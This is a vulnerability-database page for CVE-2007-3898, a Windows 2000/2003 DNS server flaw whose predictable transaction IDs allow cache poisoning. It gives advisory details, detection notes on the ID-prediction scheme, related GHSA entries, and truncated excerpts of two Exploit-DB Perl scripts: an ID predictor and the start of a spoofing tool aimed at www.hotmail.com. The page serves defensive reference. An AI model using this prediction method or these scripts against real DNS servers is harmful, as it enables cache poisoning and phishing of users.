CVE-2007-3898
published 2007-11-14CVE-2007-3898: The DNS server in Microsoft Windows 2000 Server SP4, and Server 2003 SP1 and SP2, uses predictable transaction IDs when querying other DNS servers, which…
PriorityP351medium6.4CVSS 2.0
AVNACLAuNCNIPAP
EXPLOIT
EPSS
55.13%
98.9th percentile
The DNS server in Microsoft Windows 2000 Server SP4, and Server 2003 SP1 and SP2, uses predictable transaction IDs when querying other DNS servers, which allows remote attackers to spoof DNS replies, poison the DNS cache, and facilitate further attack vectors.
Detection & IOCsextracted from sources · hover to see the quote
- →Windows DNS Server TRXID predictability: the highest two bits of the transaction ID are always 0, and the ID follows a structured pattern with fields M (bits 13-11), C (bits 10-3), and L (bits 2-0). Detect anomalous DNS transaction ID sequences where C mod 8 == 7 and subsequent IDs match the 8 predicted values. ↗
- →Detect DNS cache poisoning attempts: monitor for a burst of up to 500 spoofed UDP DNS responses (source port 53) sent to a target DNS server's query port in rapid succession, all with incrementing transaction IDs from a predicted base set of 8 values. ↗
- →The exploit probes the target DNS server by sending recursive NS queries for a controlled zone (e.g., *.cache-poisoning.net) to observe returned transaction IDs and infer the TRXID sequence. Monitor for repeated recursive DNS queries from a single source to unusual/attacker-controlled zones. ↗
- →The exploit pre-caches the NS record for the target domain before spoofing, using a preliminary NS query. Detect DNS servers receiving NS queries for a domain immediately followed by a flood of spoofed A-record responses for the same domain. ↗
- →The exploit tracks 8 parallel TRXID sequences (num_seq = 8), consistent with Windows DNS using 8 RC4 cipher instances for ID generation. Anomalous DNS traffic showing IDs cycling across exactly 8 arithmetic progressions is indicative of exploitation. ↗
- →Windows DNS Server TRXID prediction: next TRXID is one of 8 values computed as (m<<11)|((C+1 mod 256)<<3) for m in 0..7. IDS/IPS rules should flag DNS responses whose IDs match this predictable pattern against a known Windows DNS server. ↗
- ·The exploit targets Windows DNS Server's use of CryptGenRandom with 8 RC4 instances for transaction ID generation. The TRXID prediction only works when the highest two bits of the observed TRXID are 0; non-zero high bits indicate a non-Windows target or endian mismatch. ↗
- ·Prediction requires observing a TRXID where C mod 8 == 7; otherwise the attacker must wait for the counter to reach that state before the next ID can be predicted. ↗
- ·The exploit assumes the target DNS server always uses the first nameserver returned for a domain when forwarding recursive queries, which is a Windows DNS Server-specific behavior leveraged to maximize spoofing success. ↗
- ·The maximum tolerated difference between two subsequent IDs in the same sequence is 500; IDs diverging beyond this threshold are not attributed to the same sequence, limiting the prediction window. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8j6p-hw9p-9vh5: Memory leak in the DNS server in Microsoft Windows allows remote attackers to cause a denial of service (memory consumption) via DNS packets
ghsa_unreviewed·2022-05-14·CVSS 6.4
CVE-2008-6194 [MEDIUM] GHSA-8j6p-hw9p-9vh5: Memory leak in the DNS server in Microsoft Windows allows remote attackers to cause a denial of service (memory consumption) via DNS packets
Memory leak in the DNS server in Microsoft Windows allows remote attackers to cause a denial of service (memory consumption) via DNS packets. NOTE: this issue reportedly exists because of an incorrect fix for CVE-2007-3898.
GHSA
GHSA-5m49-9cvp-c8jj: The DNS server in Microsoft Windows 2000 Server SP4, and Server 2003 SP1 and SP2, uses predictable transaction IDs when querying other DNS servers, wh
ghsa_unreviewed·2022-05-01
CVE-2007-3898 [MEDIUM] GHSA-5m49-9cvp-c8jj: The DNS server in Microsoft Windows 2000 Server SP4, and Server 2003 SP1 and SP2, uses predictable transaction IDs when querying other DNS servers, wh
The DNS server in Microsoft Windows 2000 Server SP4, and Server 2003 SP1 and SP2, uses predictable transaction IDs when querying other DNS servers, which allows remote attackers to spoof DNS replies, poison the DNS cache, and facilitate further attack vectors.
GHSA
GHSA-qwjc-5gc9-97xh: The CryptGenRandom function in Microsoft Windows 2000 generates predictable values, which makes it easier for context-dependent attackers to reduce th
ghsa_unreviewed·2022-05-01·CVSS 6.4
CVE-2007-6043 [MEDIUM] CWE-200 GHSA-qwjc-5gc9-97xh: The CryptGenRandom function in Microsoft Windows 2000 generates predictable values, which makes it easier for context-dependent attackers to reduce th
The CryptGenRandom function in Microsoft Windows 2000 generates predictable values, which makes it easier for context-dependent attackers to reduce the effectiveness of cryptographic mechanisms, as demonstrated by attacks on (1) forward security and (2) backward security, related to use of eight instances of the RC4 cipher, and possibly a related issue to CVE-2007-3898.
No detection rules found.
Exploit-DB
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)
exploitdb·2007-11-13
CVE-2007-3898 Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)
---
source: https://www.securityfocus.com/bid/25919/info
Microsoft Windows DNS Server is prone to a vulnerability that permits an attacker to spoof responses to DNS requests.
A successful attack will corrupt the DNS cache with attacker-specified content. This may aid in further attacks such as phishing.
$TRXID=$ARGV[0];
$zero=$TRXID>>14;
if ($zero!=0)
{
print "Highest two bits are not 0.\n";
print "Is this really Windows DNS server? check endian issues!\n";
exit(0);
}
$M=($TRXID>>11) & 7;
$C=($TRXID>>3) & 0xFF;
$L=$TRXID & 7;
if (($C % 8)!=7)
{
print "C mod 8 is not 7 - can't predict next TRXID.\n";
print "Wait for C mod 8 to become 7\n";
exit(0);
}
print "Next TRXID is one of the following 8 values:\n";
for ($m=0;$m<8;$
Exploit-DB
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
exploitdb·2007-11-13
CVE-2007-3898 Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
---
source: https://www.securityfocus.com/bid/25919/info
Microsoft Windows DNS Server is prone to a vulnerability that permits an attacker to spoof responses to DNS requests.
A successful attack will corrupt the DNS cache with attacker-specified content. This may aid in further attacks such as phishing.
#!/usr/bin/perl
use strict;
use Net::DNS;
use Net::DNS::Nameserver;
use IO::Socket;
use Net::RawIP;
sub usage {
print ("$0 is a program for DNS id spoofing.\n");
print ("usage: $0 target tospoof ourzone port\n");
print ("Example: $0 ns1.belbone.be www.hotmail.com .cache-poisoning.net 1025\n");
}
my($target, $tospoof, $ourzone, $query_port) = @ARGV;
$tospoof = "www.hotmail.com" unless($tospoof);
$ourzone = ".cache-poiso
No writeups or analysis indexed.
http://secunia.com/advisories/27584http://securityreason.com/securityalert/3373http://www.kb.cert.org/vuls/id/484649http://www.scanit.be/advisory-2007-11-14.htmlhttp://www.securityfocus.com/archive/1/483635/100/0/threadedhttp://www.securityfocus.com/archive/1/483698/100/0/threadedhttp://www.securityfocus.com/archive/1/484186/100/0/threadedhttp://www.securityfocus.com/bid/25919http://www.securitytracker.com/id?1018942http://www.trusteer.com/docs/windowsdns.htmlhttp://www.us-cert.gov/cas/techalerts/TA07-317A.htmlhttp://www.vupen.com/english/advisories/2007/3848https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-062https://exchange.xforce.ibmcloud.com/vulnerabilities/36805https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A4395http://secunia.com/advisories/27584http://securityreason.com/securityalert/3373http://www.kb.cert.org/vuls/id/484649http://www.scanit.be/advisory-2007-11-14.htmlhttp://www.securityfocus.com/archive/1/483635/100/0/threadedhttp://www.securityfocus.com/archive/1/483698/100/0/threadedhttp://www.securityfocus.com/archive/1/484186/100/0/threadedhttp://www.securityfocus.com/bid/25919http://www.securitytracker.com/id?1018942http://www.trusteer.com/docs/windowsdns.htmlhttp://www.us-cert.gov/cas/techalerts/TA07-317A.htmlhttp://www.vupen.com/english/advisories/2007/3848https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-062https://exchange.xforce.ibmcloud.com/vulnerabilities/36805https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A4395
2007-11-14
Published